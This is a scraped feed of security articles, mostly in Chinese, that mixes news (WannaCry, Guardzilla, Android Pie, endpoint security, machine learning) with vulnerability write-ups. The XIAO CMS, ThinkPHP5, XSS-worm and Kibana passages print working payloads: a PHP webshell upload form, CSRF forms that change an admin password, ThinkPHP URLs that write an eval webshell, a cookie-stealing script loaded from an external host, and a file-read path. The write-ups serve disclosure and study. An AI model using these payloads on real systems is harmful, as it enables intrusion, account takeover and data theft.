WannaCry利用EternalBlue攻击工具对 微软 windows操作系统的服务器信息区块(SMB)漏洞展开攻击,而EternalBlue为美国国家安全局(NSA)所开发。

2017年5月12日,WannaCry在欧洲市场率先发难,加密被黑电脑上的文件并勒索赎金,并能主动侦测及入侵网络上其他有漏洞的设备,因此在短短的两天内,便在全球超过150个国家迅速感染了数十万台电脑。此外,今年造成 台积电 大当机的元凶也是WannaCry的变种。

减缓WannaCry肆虐的主要功臣是安全公司Kryptos Logic的研究人员Marcus Hutchins,他发现了WannaCry的勒索元件有一个“销毁”机制,即WannaCry会连至一个网络域名。如果WannaCry未发现该域名则加密电脑文件。换而言之,如果WannaCry连接到了该网络域名,则不会加密受感染电脑上的文件。

幸运的是,该域名竟然没人注册,随后Hutchins便注册了该域名,维持该域名的运作,成功阻止了WannaCry的勒索能力。

目前此一用来支撑“销毁”机制的域名由Cloudflare负责维护,有鉴于那些已感染WannaCry的电脑还是会定期连接到“销毁”域名,这让Kryptos Logic得以持续观察感染情况。

根据Jamie Hankins12月21日在Twitter上张贴的数据,他们当天的前24小时侦测到184个国家的22万个独立IP超过270万次连结到该“销毁”域名,前一周则有来自194个国家的63万个独立IP超过1700万次连结到该“销毁”域名。

不过,Hankins也说明这些独立IP无法代表实际的感染数量,只是这样的流量仍然很惊人。前五大流量来自中国、印尼、越南、印度及俄罗斯。

依然潜伏在电脑中的WannaCry还是有爆发的风险,例如一旦网络断线,或是无法连接“销毁”域名,WannaCry的勒索元件就会再度执行。

企业或者用户可通过Kryptos Logic免费提供的Telltale服务来侦测电脑上包括WannaCry在内的安全威胁。

XIAO CMS审计

$
0
0

翻安全客的时候看到xiao cms爆了6个cve审计一下


XIAO CMS审计
任意目录删除
XIAO CMS审计

跟进一下database.php

看到action是import找到那个函数


XIAO CMS审计

可以看到 paths 这个post参数并没有对 ./ 进行过滤,可以进行任意文件删除,而且payload的paths参数应该是post=。=

放一个自己的目录测试一下


XIAO CMS审计

创建了一个 ckj123 的目录,试下能不能删除


XIAO CMS审计
XIAO CMS审计

成功

任意文件上传
XIAO CMS审计

很明显的可以看到uploadfile.php文件

找到上传文件的地方

所有的upload需要一个upload函数


XIAO CMS审计

看到他加载了一个叫做upload的类

然后获得了文件最后的扩展名,判断了是图片还是别的文件

跟进upload


XIAO CMS审计

跟进upload类


XIAO CMS审计

里面有个过滤的地方


XIAO CMS审计
XIAO CMS审计

获得后缀,跟限制的类型进行比较


XIAO CMS审计

可以看到这个type是需要自己传进去的


XIAO CMS审计

总共两个action

下面那个的type是规定死的

发现上面那个的type是需要自己传进去的这就可以传php文件了


XIAO CMS审计
<html> <body> <form action="http://127.0.0.1:8080/admin/index.php?c=uploadfile&a=uploadify_upload&type=php&size=1000" method="post" enctype="multipart/form-data"> <input type="file" name="file" /> <input type="submit" name="submit" value="submit" /> </form> </body> </html>

CVE给的payload不对。。


XIAO CMS审计

成功了,然后连接一下这个马


XIAO CMS审计
CSRF

他没有判断referer是从哪里来的,可以随意csrf,举两个例子

任意添加一个xss面板

<html> <body> <form action="http://127.0.0.1:8080/admin/index.php?c=content&a=add&catid=3" method="POST"> <input type="hidden" name="data[catid]" value="3" /> <input type="hidden" name="data[title]" value="test" /> <input type="hidden" name="data[thumb]" value="" /> <input type="hidden" name="data[keywords]" value="" /> <input type="hidden" name="data[description]" value="" /> <input type="hidden" name="data[content]" value="<script>alert(1)</script>" /> <input type="hidden" name="data[xiao_auto_description]" value="1" /> <input type="hidden" name="data[xiao_auto_thumb]" value="1" /> <input type="hidden" name="data[xiao_download_image]" value="1" /> <input type="hidden" name="data[time]" value="2018-11-02+15:05:43" /> <input type="hidden" name="data[hits]" value="" /> <input type="hidden" name="submit" value="提交" /> <input type="submit" value="Submit request" /> </form> </body> </html>

改管理员的密码

<form action="http://127.0.0.1:8080/admin/index.php?c=index&a=my" method="POST"> <input type="hidden" name="data[password]" value="1234567"> <input type="hidden" name="submit" value="提交" /> <input type="submit" value="Submit request" /> </form> 后记

xss的漏洞没看,以后有空补上

5 Steps to Mitigate Endpoint Security Incidents

$
0
0

Endpoint security may be the best investment you have ever made. According to a Ponemon survey The 2017 State of Endpoint Security Risk the average cost to an organization of attacks that managed to breach endpoint security was $5 million.

In this article, we will look at what you need to know about endpoint security in order to develop a workable strategy to mitigate endpoint-related incidents.

What is an endpoint?

In IT, an endpoint is a device e.g. a computer, mobile or wireless device, server, etc. that has a remote connection to a network, and is a potentially vulnerable access point or gateway to a network.

What is endpoint security?

Endpoint security involves creating policies that lay down the rules with which devices must comply before they can access network resources. Endpoint security is particularly important today as more and more organizations adopt BYOD, increasing the number of devices presenting a risk to the network.

Traditional anti-virus protection is no longer sufficient to protect endpoints and organizations. The four essentials of an effective endpoint security strategy are:

Discovery (and Inventory) Discovery and vulnerability scanning tools can help you inventory your network assets as well as unprotected endpoints, and assist you in drawing up a security requirements plan Monitoring (and Threat Hunting) A centralized endpoint management tool will enable automated, consistent monitoring of the network and should include active threat hunting software Protection While anti-virus is not sufficient on its own as an endpoint security strategy, implementing an advanced anti-malware application is non-negotiable Response (and Alerting) Your network management tool must include the capability for instant remediation in the event of a breach. You will also need a written incident response policy. Important steps to mitigate cyber security incidents generally

An endpoint security strategy is just one part of an organization’s bigger cybersecurity picture. Endpoints do not operate in a vacuum; patching your operating system, performing daily backups and educating your users will all contribute to bolstering your endpoint security.

A document developed by the Australian Signals Directorate (ASD) Strategies to Mitigate Cyber Security Incidents Mitigation Details provides an excellent overview of all the steps you need to take to bolster the security of your entire system, including its endpoints. The list is comprehensive and gives a sobering overview of the challenges your IT security employees need to address. The following steps are lifted verbatim from the document and provide a useful checklist for companies to analyze their current protection policies and potential vulnerabilities, including those related to endpoints.

Mitigation strategies to prevent malware delivery and execution Application whitelisting Patch applications Configure Microsoft Office macro settings User application hardening Automated dynamic analysis of email and web content run in a sandbox Email content filtering Web content filtering Deny corporate computers direct Internet connectivity Operating system generic exploit mitigation Server application hardening Operating system hardening Antivirus software using heuristics and reputation ratings Control removable storage media and connected devices Block spoofed emails User education Antivirus software with up-to-date signatures TLS encryption between email servers Mitigation strategies to limit the extent of cyber security incidents Restrict administrative privileges Patch operating systems Multi-factor authentication Disable local administrator accounts Network segmentation Protect authentication credentials Non-persistent virtualized sandboxed environment Software-based application firewall, blocking incoming network traffic Software-based application firewall, blocking outgoing network traffic Outbound web and email data loss prevention Mitigation strategies to detect cyber security incidents and respond Continuous incident detection and response Host-based intrusion detection/prevention system Endpoint detection and response software Hunt to discover incidents Network-based intrusion detection/prevention system Capture network traffic Mitigation strategies to recover data and system availability Daily backups Business continuity and disaster recovery plans System recovery capabilities Mitigation strategy specific to preventing malicious insiders Personnel management

According to a Kaspersky Lab article How to mitigate 85% of threats with only four strategies the ASD directorate is “the best publicly available guidelines from a government organization on how to successfully fight APTs.”

In an innovative approach to developing security foci, Kaspersky summarizes the ASD’s strategies (what we have labeled steps) by four logical types. Next to each type below, we suggest an example of an application of this strategy, applicable to endpoint security:

Administrative Training and security awareness: A 2016 survey What are the biggest threats to endpoint security in your organization? of security professionals found that negligent employee behavior when it came to following organizations’ security rules and procedures was the biggest endpoint security threat. Networking Network segmentation can prevent unauthorized traffic from spreading across a breached network and affecting other endpoints. System administration Software patching: A new trend in endpoint security threats is the fileless attack . According to Mcafee, the best protection is keeping your software up-to-date. Specialized security administration Endpoint Detection and Response ( EDR ) software to find vulnerabilities before a breach occurs. 5 strategies to mitigate endpoint incidents

Professional endpoint security solutions usually provide the software to help you implement the below strategies, but there are also free and open source tools to help you get started. It is recommended you use a free tool initially to map the endpoints on your network in order to get a better understanding of your security requirements. A specialist tool can later do a more detailed scan.

Network analysis You can’t protect an endpoint you don’t know is there, what in the industry is called a dark endpoint, rogue access point or blind spot. You can use an automated network discovery tool to inventory your endpoints, identify who is accessing them and what software they are running. Brush up on modern endpoint security techniques DLP, EDR, NAC, HIPS … do you know what these techniques are all about? Read more below. Research specialized endpoint security solution options There is a plethora of professional endpoint security suites on the market. It can be confusing. Learn what to ask a vendor before you select a solution. Solution Review provides some tips below. Prioritize automated endpoint detection and response (EDR) EDR should be the cornerstone of your strategy as, amongst other things, it proactively hunts for potential threats. Implement an endpoint security policy This should be a written document that describes the software and hardware your company has employed to protect network endpoints. It should also provide security guidelines for employees, e.g. how to secure their BYOD endpoints. Modern security techniques

When you choose an endpoint solution, ask your vendor whether their product includes the following layers of protection:

Host-Based Intrusion Prevention System (HIPS) Incorporates intrusion detection and firewall elements to alert users to attempted malicious activity and prevent it being carried out. It protects your network from known and unknown cyber attack by monitoring code for suspicious activity on a host. For example, a HIPS might notice that code is being executed to try and shut down your anti-virus and prevent it from doing so. Data Loss Prevention (DLP) Designed to help network administrators prevent sensitive information from being sent outside a network, e.g. emails or files. Network Access Control (NAC) Enforces policies that define who can have access to a network and what privileges they have, e.g. employees versus guests. For example, NAC can ensure compromised endpoints are shut down in the event of an incident. Endpoint Detection and Response (EDR) A one-stop solution that allows administrators to monitor networks, detect and investigate possible threats, and respond to attack. EDR utilizes complex analytic algorithms to provide constant visibility into the network from a centralized portal. Top EDRs allow integration with 3rd party tools, enabling organizations to customize their endpoint security strategy and align it with their existing security software.

Security Awareness

Specialized endpoint security solutions

Expensive but worth it, specialist, reputable endpoint solution vendors include Check Point , Comodo , Symantec , Kaspersky and McAfee . The problem is not the price but deciding which solution to run with. Largely, the above products are very similar; they are just marketed differently.

The Check Point solution provides an example of what basic features you should be looking for to protect your endpoints:

Ability to encrypt entire disks, removable devices and ports Advanced anti-virus and anti-malware software Intelligent behavioral analysis and reporting Remote access VPN for employees on the road An advanced firewall and compliance checking ability to ensure endpoint behavior is in accordance with your organization’s security policies Sandbox isolation and quarantine of threats and compromised hosts An endpoint policy management dashboard that provides maximum visibility into all security areas in the company and allows for immediate remediation in the event of an incident

Solutions Review’s Endpoint Security Buyer’s Guide (paywall) is a guide to choosing an endpoint solution from the most popular vendors. The downloadable PDF includes tips on what you should ask your potential new provider:

Does the product’s core functionality anti-malware, firewall and device control feature the latest techniques, e.g. behavioral detection? Is the solution platform- and OS-agnostic? Does it have a centralized management console that can provide a granular view of your data? How does it react to unexpected threats, e.g. Zero Day? What support does the vendor offer? Free endpoint security tools

Bearing in mind that you (hopefully) have security software and policies in place, it might be a good idea to try before you buy and explore your options. This will give you a high-level view of your current endpoint security situation, and help you learn more about your network, the devices connected to it and what the best solution for your requirements might be.

Use Shodan to identify any unprotected internet-connected devices on your network Try PacketFrence , a free Network Access Control (NAC) solution Experiment with a solution that offers a trial evaluation . eSecurity Planet has done all the research. Also, check out SecureAPlus , DeviceLock and Comodo . Two network discovery tools to try out are Open-AudIT and NetSurveyor Nmap is a popular, and powerful, open source network mapper OPSWAT is a free endpoint security scanner that includes networking mapping and anti-malware

Machine Learning in Cybersecurity Demystifying Buzzwords & Getting to t ...

$
0
0

Earlier this month, I had the opportunity to discuss the role of machine learning in security with Dave Shackleford from SANS. It was a fun discussion, and if you have the time, I encourage you to check it out here .

One of the recurring themes throughout our discussion was the need to separate the marketing hype from the reality when it comes to the capabilities (and use) of data science, particularly in security. I think this is a really important topic and one I’d like to dig into more here. New analytical and detection models are absolutely changing the world of security. We are transitioning from a time of static signatures to more complex multi-dimensional detection models that can understand the behavior of an attacker. To say this is important is an understatement.

But on the other hand, I think many security vendors have gotten a bit drunk on AI buzzwords, and worse still, are treating their algorithms like magical black boxes. If you can’t see how the detection system works and vendors are playing fast and loose with terminology, how can you have confidence in your security? So with that in mind, I’d like to offer a take that tries to demystify some of the terminology and focus on the practical side of what matters for your security when it comes to data science and machine learning.

AI Disambiguation

Artificial Intelligence has become a sort of strange term in society. You see it referred to in all sorts of marketing, including security marketing. But if you ask someone to explain what that AI means, you typically get vague answers. And that is because there is a bit of a mismatch between the cultural and technical uses of the term Artificial Intelligence. Culturally when we say AI, we often think of SkyNet or Ex Machina, depending on which decade you get your science fiction. This sort of AI is referred to as “General AI” and refers to the ability for a machine to solve virtually any problem that a human could. This form of AI also doesn’t exist today.

The AI that we have today is what is called “Narrow AI” and it refers to teaching a machine to tackle a specific problem playing chess, recognizing a voice, or detecting an application attack. This notion of AI has been around since the 1960s and is used to describe a host of analytical techniques including machine learning.

And this is the disconnect. If you ask most people about AI and machine learning, they often think that AI is more sophisticated than machine learning. But in terms of the narrow AI that we have today, AI is actually the more generic term. And this is why I hate seeing AI being overused in marketing. It sounds cool, but it almost never means something concrete.

It’s All About Work Reduction

The reality is that data science and machine learning should be extremely tangible to your organization. Most enterprises are generating way more data than their analysts could ever analyze. By 2020, it’s estimated that for every person on earth, 1.7MB of data will be created every second. That’s staggering. This trend is particularly true in security with threat feeds, intelligence, endless reputation lists, IOCs, signature, and more being constantly updated. Additionally, threats are constantly adapting to avoid detection moving IP addresses, repacking their payloads, obfuscating their attack code. The combined result is that security teams have more data than they can manually analyze and the adversaries are evolving too fast to keep up with. This is a real-world, practical case for new analytical models.

You’ll notice that I didn’t jump to just saying this is a use case for machine learning. Machine learning is a great tool, and it’s one we use. But it doesn’t have to be the only tool. Sometimes good old-fashioned statistical analysis can be very effective. K-means clustering is a great example. To me, k-means doesn’t really qualify as machine learning, but it can be incredibly useful at identifying groups within a large data set. That information can then be used to inform a risk engine of what group a session matches in our case that might be normal, abnormal or malicious. The point really isn’t to brag about k-means per se, but rather to remind ourselves not to get overly attached to certain terms. In the same way that the term AI can be oversold, sometimes “statistics” is undersold. If it solves a problem and helps us get answers out of our data and make better decisions, then we want to use it.

And this is ultimately where any use of data science in security reaches its moment of truth. Is the technology able to make trustworthy decisions that reduce the workload on security staff? This need is particularly true at the WAF, where for years, organizations have relied on human effort to tune signatures and rules, only to still deal with false positives and false negatives.

We are solving this problem at ThreatX. We aren’t doing it with a magical black box algorithm. We use a variety of techniques that are right for their respective job that work together for a final answer. We use machine learning to train algorithms based on massive amounts of attack data. We profile applications to understand their normal behavior and find deviations. We apply statistical analysis, active deception, threat intelligence, and other techniques as well. We use all of these components with a simple goal in mind…Building a WAF that does its job and actually defends your organization. A WAF that reduces work for your security team so you can actually defend all of your applications and APIs. And that is something that I think is both exciting very practical.

ThinkPHP5 RCE漏洞重现及分析

$
0
0
一、概述

近日,thinkphp发布了安全更新,修复一个可getshell的rce漏洞,由于没有有效过滤$controller,导致攻击者可以利用命名空间的方式调用任意类的方法,进而getshell。


ThinkPHP5 RCE漏洞重现及分析
二、影响范围 5.x < 5.1.31 5.x < 5.0.23

以及基于ThinkPHP5 二次开发的cms,如AdminLTE后台管理系统、thinkcmf、ThinkSNS等

shadon一下:


ThinkPHP5 RCE漏洞重现及分析
三、漏洞重现 win7+thinkphp5.1.24

(1)执行phpinfo

/index.php/?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
ThinkPHP5 RCE漏洞重现及分析

(2)写一句话木马

/index.php/?s=index/\think\template\driver\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>’
ThinkPHP5 RCE漏洞重现及分析
debian+thinkphp5.1.30

(1)执行phpinfo

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
ThinkPHP5 RCE漏洞重现及分析

(2)写一句话木马

/index.php/?s=index/\think\template\driver\file/write&cacheFile=zxc0.php&content=<?php @eval($_POST[xxxxxx]);?>
ThinkPHP5 RCE漏洞重现及分析
win7+thinkphp5.0.16

(1)执行phpinfo

/index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
ThinkPHP5 RCE漏洞重现及分析

(2)写一句话木马

/index.php/?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=zxc1.php&vars[1][]=<?php @eval($_POST[xxxxxx]);?>
ThinkPHP5 RCE漏洞重现及分析
四、修复方案 1. 直接git/composer更新 2. 手工修复

5.1版本

在think\route\dispatch\Url类的parseUrl方法,解析控制器后加上

if ($controller && !preg_match(‘/^[A-Za-z](\w|\.)*$/’, $controller)) { throw new HttpException(404, ‘controller not exists:’ . $controller);}

5.0版本

在think\App类的module方法的获取控制器的代码后面加上

if (!preg_match(‘/^[A-Za-z](\w|\.)*$/’, $controller)) { throw new HttpException(404, ‘controller not exists:’ . $controller);}

如果改完后404,尝试修改正则,加上\/

if (!preg_match(‘/^[A-Za-z\/](\w|\.)*$/’, $controller)) { 五、漏洞分析

Thinkphp5.1.24

先看补丁:


ThinkPHP5 RCE漏洞重现及分析

对controller添加了过滤

查看路由调度:

Module.php:83

public function exec()
{
// 监听module_init
$this->app['hook']->listen('module_init');
try {
// 实例化控制器
$instance = $this->app->controller($this->controller,
$this->rule->getConfig('url_controller_layer'),
$this->rule->getConfig('controller_suffix'),
$this->rule->getConfig('empty_controller'));
} catch (ClassNotFoundException $e) {
throw new HttpException(404, 'controller not exists:' . $e->getClass());
}
......
$data = $this->app->invokeReflectMethod($instance, $reflect, $vars);
return $this->autoResponse($data);
});

$instance = $this->app->controller

实例化控制器以调用其中的方法

查看controller方法

App.php:719

public function controller($name, $layer = 'controller', $appendSuffix = false, $empty = '')
{
list($module, $class) = $this->parseModuleAndClass($name, $layer, $appendSuffix);
if (class_exists($class)) {
return $this->__get($class);
} elseif ($empty && class_exists($emptyClass = $this->parseClass($module, $layer, $empty, $appendSuffix))) {
return $this->__get($emptyClass);
}
throw new ClassNotFoundException('class not exists:' . $class, $class);
}

list($module, $class) = $this->parseModuleAndClass($name, $layer, $appendSuffix);

parseModuleAndClass解析$name为模块和类,再实例化类

查看该方法,第640行

protected function parseModuleAndClass($name, $layer, $appendSuffix)
{
if (false !== strpos($name, '\\')) {
$class = $name;
$module = $this->request->module();
} else {
if (strpos($name, '/')) {
list($module, $name) = explode('/', $name, 2);
} else {
$module = $this->request->module();
}
$class = $this->parseClass($module, $layer, $name, $appendSuffix);
}
return [$module, $class];
}

可以看出如果$name包含了\,就

$class = $name; $module = $this->request->module(); …… return [$module, $class]; 直接将$name作为类名了,而命名空间就含有\,所以可以利用命名空间来实例化任意类

现在看看如何控制$name,即$controller。

查看路由解析,即如何解析url的

Url.php:37

protected function parseUrl($url)
{
$depr = $this->rule->getConfig('pathinfo_depr');
$bind = $this->rule->getRouter()->getBind();
if (!empty($bind) && preg_match('/^[a-z]/is', $bind)) {
$bind = str_replace('/', $depr, $bind);
// 如果有模块/控制器绑定
$url = $bind . ('.' != substr($bind, -1) ? $depr : '') . ltrim($url, $depr);
}
list($path, $var) = $this->rule->parseUrlPath($url);
if (empty($path)) {
return [null, null, null];
}

list($path, $var) = $this->rule->parseUrlPath($url);

调用了parseUrlPath(),继续跟进

查看Rule.php:947

public function parseUrlPath($url)
{
// 分隔符替换 确保路由定义使用统一的分隔符
$url = str_replace('|', '/', $url);
$url = trim($url, '/');
$var = [];
if (false !== strpos($url, '?')) {
// [模块/控制器/操作?]参数1=值1&参数2=值2...
$info = parse_url($url);
$path = explode('/', $info['path']);
parse_str($info['query'], $var);
} elseif (strpos($url, '/')) {
// [模块/控制器/操作]
$path = explode('/', $url);
} elseif (false !== strpos($url, '=')) {
// 参数1=值1&参数2=值2...
$path = [];
parse_str($url, $var);
} else {
$path = [$url];
}
return [$path, $var];
}

用/分割url获取每一部分的信息,未过滤

看看如何获取url:

Request.php:716

/**
* 获取当前请求URL的pathinfo信息(不含URL后缀)
* @access public
* @return string
*/
public function path()
{
if (is_null($this->path)) {
$suffix = $this->config['url_html_suffix'];
$pathinfo = $this->pathinfo();
if (false === $suffix) {
// 禁止伪静态访问
$this->path = $pathinfo;
} elseif ($suffix) {
// 去除正常的URL后缀
$this->path = preg_replace('/\.(' . ltrim($suffix, '.') . ')$/i', '', $pathinfo);
} else {
// 允许任何后缀访问
$this->path = preg_replace('/\.' . $this->ext() . '$/i', '', $pathinfo);
}
}
return $this->path;
}

注意在该文件第31行

// PATHINFO变量名 用于兼容模式

‘var_pathinfo’ => ‘s’,

所以可以用pathinfo或s来传路由

//windows会将pathinfo的\替换成/,建议用s

综上可构造payload如:

技术讨论 | 记一次XSS蠕虫渗透实验

$
0
0

*本文原创作者:莫妮卡k37,本文属于CodeSec原创奖励计划,未经许可禁止转载

大体思路

1.在发帖的内容处发现了存储型XSS

2.对帖子(母贴)的内容进行构造,插入CSRF POC,并对其中内容输出为302永久重定向到母感染贴

3.所有浏览此页面的用户都会自动发布一个重定向到母感染贴的子贴,重定向到母贴时又再次执行母贴中的POC再次创建一个子贴。

以上就是XSS+CSRF构造蠕虫大体的思路,下面细化各个步骤的过程,水平不高,适合XSS初学者的进阶。

一、存储型XSS

1.进入发帖处,添加初步测试payload,并查看源码:


技术讨论 | 记一次XSS蠕虫渗透实验

2.观察到可以大小写混淆绕过,于是构造payload(对于屏蔽括号的可以用 ’ 来代替):

<sCrIpt>alert'xss'</sCrIpt>
技术讨论 | 记一次XSS蠕虫渗透实验

3.刷新页面观察效果,成功弹窗:


技术讨论 | 记一次XSS蠕虫渗透实验

4.插入JS脚本,利用XSS平台窃取用户cookie,这是最常用的XSS利用手法。

POC: <sCRiPt/SrC=//60.wf/m5VP>

SRC引用的是短地址,内容为窃取用户cookie的JS脚本,详细可以使用XSS平台自动生成:


技术讨论 | 记一次XSS蠕虫渗透实验
二、XSS配合CSRF的初步测验

1.首先验证是否存在CSRF,同样在发布新贴处,填写标题内容,点击发布抓包:


技术讨论 | 记一次XSS蠕虫渗透实验

2.burp自带的生成CSRF POC,POST包处-》右键-》generate csrf poc -》保存-》使用另一个账号发送POC,查看自己的帖子,发现成功发送新帖。

3.编写JS脚本(可以利用Xss’or来生成)


技术讨论 | 记一次XSS蠕虫渗透实验

4.CSRF+存储型XSS将脚本插入到页面中:


技术讨论 | 记一次XSS蠕虫渗透实验

如图,内容为发布新帖的JS脚本,点击发布,就生成了新帖。

5.浏览此贴,提示成功:


技术讨论 | 记一次XSS蠕虫渗透实验

6.可以看到成功发布出去:


技术讨论 | 记一次XSS蠕虫渗透实验

7.使用其他用户浏览帖子测试―-发现同样不知觉的发了个新帖,至此,XSS+CSRF的攻击已经完成:


技术讨论 | 记一次XSS蠕虫渗透实验
三、蠕虫的构造

再整理一下思路。

蠕虫的前提是子贴的内容,即点击我们母感染贴的用户所发布的子贴的内容是可控的:

1.攻击者创建一个攻击帖(母帖),贴中JS脚本包含: ①创建一个子回传帖 ②子回传帖的内容是重定向到母帖 2.用户浏览母帖,然后自动创建一个子回传帖; 3.子回传帖403重定向到母帖; 4.根据内容又创建一个子回传帖; 5.用户之间互相浏览,发散,传播,不拉不拉不拉,造成蠕虫攻击。

1.任意发表新帖:


技术讨论 | 记一次XSS蠕虫渗透实验

2.记录帖子的URL并点击编辑:


技术讨论 | 记一次XSS蠕虫渗透实验

3.插入JS脚本,其中控制子回传贴302重定向到母贴的URL。

payload: <embed/src=/bang.duia.com/web/normal/topic/806440>

意为在页面中插入一个新页面,这个新页面为母贴。


技术讨论 | 记一次XSS蠕虫渗透实验

4.发布后浏览,已生成子回传贴:


技术讨论 | 记一次XSS蠕虫渗透实验

5.打开子回传贴,发现了在母贴JS脚本中构造的框架:


技术讨论 | 记一次XSS蠕虫渗透实验

6.但是在FireFox却很遗憾没有成功,打开Network发现了这样一个提示。意为无效的CORS(跨域资源共享)请求。猜测此处应该是属于白名单拦截,限制了JS的入口:


技术讨论 | 记一次XSS蠕虫渗透实验

7.通过IE可以运行:


技术讨论 | 记一次XSS蠕虫渗透实验
技术讨论 | 记一次XSS蠕虫渗透实验

8.重点!!这些都不是最重要的,因为这是一个APP,所以用户基本上是依赖手机端来运行。之后在手机端上查看帖子成功通过子回传URL重定向到母贴并创建了一个新的子回传贴。虽然网站可能有WAF,电脑端IE可以蠕起来,但是发现,app端没有做任何防护,直接可以传播。


技术讨论 | 记一次XSS蠕虫渗透实验
技术讨论 | 记一次XSS蠕虫渗透实验
*本文原创作者:莫妮卡k37,本文属于CodeSec原创奖励计划,未经许可禁止转载

Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)

$
0
0

不久前Elasticsearch发布了最新安全公告, Elasticsearch Kibana6.4.3之前版本和5.6.13之前版本中的Console插件存在严重的本地文件包含漏洞可导致拒绝服务攻击、任意文件读取攻击、配合第三方应用反弹SHELL攻击,下文笔者对其漏洞背景、攻击原理和行为进行分析和复现。

一、影响范围

Elasticsearch Kibana是荷兰Elasticsearch公司的一套开源的、基于浏览器的分析和搜索Elasticsearch仪表板工具,作为Elasticsearch的核心组件,Kibana可作为产品或服务提供,并与各种系统,产品,网站和企业中的其他Elastic Stack产品配合使用。 由于Kibana在大数据领域用途较为广泛,此次漏洞影响范围较大,Shodan搜索结果如图


Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
二、 漏洞场景

笔者选择Kibana-6.1.1-linux-x86_64.tar.gz版本,搭建过程不表,网上很多参考资料

2.1、拒绝服务

拒绝服务笔者选择/cli_plugin/index.js演示,攻击向量如下


Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
GET请求发出去后客户端打不开应用页面,在服务端Kibana进程退出,应用服务挂掉具体看下图
Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
2.2、任意文件读取

文件读取笔者选择/etc/passwd演示,攻击向量如下


Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
GET请求发出去后客户端页面会抛出500错误,在服务端会将读取到的passwd内容抛出来,具体看下图
Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
2.3、配合第三方应用

通常情况下Kibana与其他的应用程序一起部署,如果应用程序可以上传或者写入javascript文件的话,攻击者可以通过Nodejs创建一个Reverse Shell,内容如下


Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
路径遍历允许攻击者访问Kibana服务器任何文件的位置,如下
Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
Nc反弹监听得到交互会话
Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
三、漏洞分析

漏洞污染点位于\src\core_plugins\console\api_server\server.js


Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
Apis 得到的值传递给赋值参数name,从图上也能看到name变量的内容没有进行任何过滤被引入到require,而require模块在Nodejs里表示加载模块的方式,可以加载核心模块,例如内置的“http”,也可以是包含名为“index.js”这样的文件或目录如果参数以“/”、“./”、”../”开头则函数知道该模块是文件或者文件夹,继续跟进到函数asJson所在的api.js文件中 。
Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
在同级目录下ES_5_0.js 中有一个这个类的导出实例
Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
总结一下此函数的正常流程是获取导出API类实例并调用函数asJson的JavaScript文件的名称,但是忽略了过滤验证因此我们可以指定任意文件,配合目录跳转遍历就可以实现Kibana服务器上任意文件读取的操作。基于上述的分析很明显Nodejs应用程序需要大量的文件,如果这些文件里包含了process.exit指令,那么就可能关闭Kibana进程并导致拒绝服务攻击,通过搜索找到了三个可能的攻击向量
Elasticsearch核心插件Kibana本地文件包含漏洞分析(CVE-2018-17246)
四、一点总结

LFI通常出现在php应用中,通样是require这次应用在Nodejs程序中,相信未来还会有更多的Nodejs程序存在这种问题,原因是本地包含漏洞出现了很多年,但依旧有很多软件开发人员和架构师没有考虑到这点,这篇文章很好的说明了Kibana中存在的一个关键LFI漏洞,使得攻击者能够在服务器上运行本地代码,可造成直接的危害就是拒绝服务攻击,若在生产环境下业务实在伤不起,需要引起对Nodejs LFI的重视。

五、参考链接

https://github.com/appsecco/vulnerable-apps/tree/master/node-reverse-shell

https://www.elastic.co/downloads/kibana

http://www.cnvd.org.cn/flaw/show/CNVD-2018-23907

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17246

*本文作者: Ivan1ee@360云影实验室,转载请注明来自 CodeSec.Net。

IoT Bug Grants Access to Home Video Surveillance

$
0
0

Due to a shared Amazon S3 credential, all users of a certain model of the Guardzilla All-In-One Video Security System can view each other's videos.

A vulnerability in the Guardzilla All-In-One Video Security System, an IoT-enabled home video surveillance system, lets all users view one another's saved surveillance footage due to the design and implementation of Amazon S3 credentials inside the camera's firmware.

Security researchers found the bug (CVE-2018-5560) during an event held by 0DayAllDay and reported it to Rapid7 for coordinated disclosure. Rapid7 published the flaw today, 60 days after it first attempted to contact the vendor. Multiple coordination efforts received no response.

This vulnerability is an issue of CWE-798: Use of Hard-coded Credentials, 0DayAllDay researchers report . Guardzilla's system uses a shared Amazon S3 credential for storing users' saved videos. When they investigated the access rights given to the embedded S3 credentials, researchers found they provide unlimited access to all S3 buckets provisioned for the account.

As a result, all people who use Guardzilla's system for home surveillance can view one another's video data in the cloud. Once the password is known, any unauthenticated person can access and download stored files and videos in buckets linked to the account.

Researchers only tested Model #GZ521W of the Guardzilla Security Video System and do not know whether other models are affected by the same bug, Rapid7 reports. Without a patch, users should ensure that the device's cloud-based data storage functions are turned off.

Read more details in Rapid7's blog here .

Dark Reading's Quick Hits delivers a brief synopsis and summary of the significance of breaking news events. For more information from the original source of the news item, please follow the link provided in this article.View Full Bio

The new security features in Android Pie and why I’m excited about them

$
0
0

I gave a talk at the Google Developer Group Devfest 18 in Ankara about Android as I do every year. Quite likely this was the last talk I will give on Android. I talked about one of the big improvements in the latest version of Android. To me, this has been the most exciting Android improvement so far. There are lots of new security and feature updates in Android Pie, and I want to introduce them here briefly.

You can get my presentation here .

Restriction on the usage of mic or camera in the background

Apps won’t be able to use your mic or camera in the background with Android Pie. This is one of the most important security features coming with the new Android.


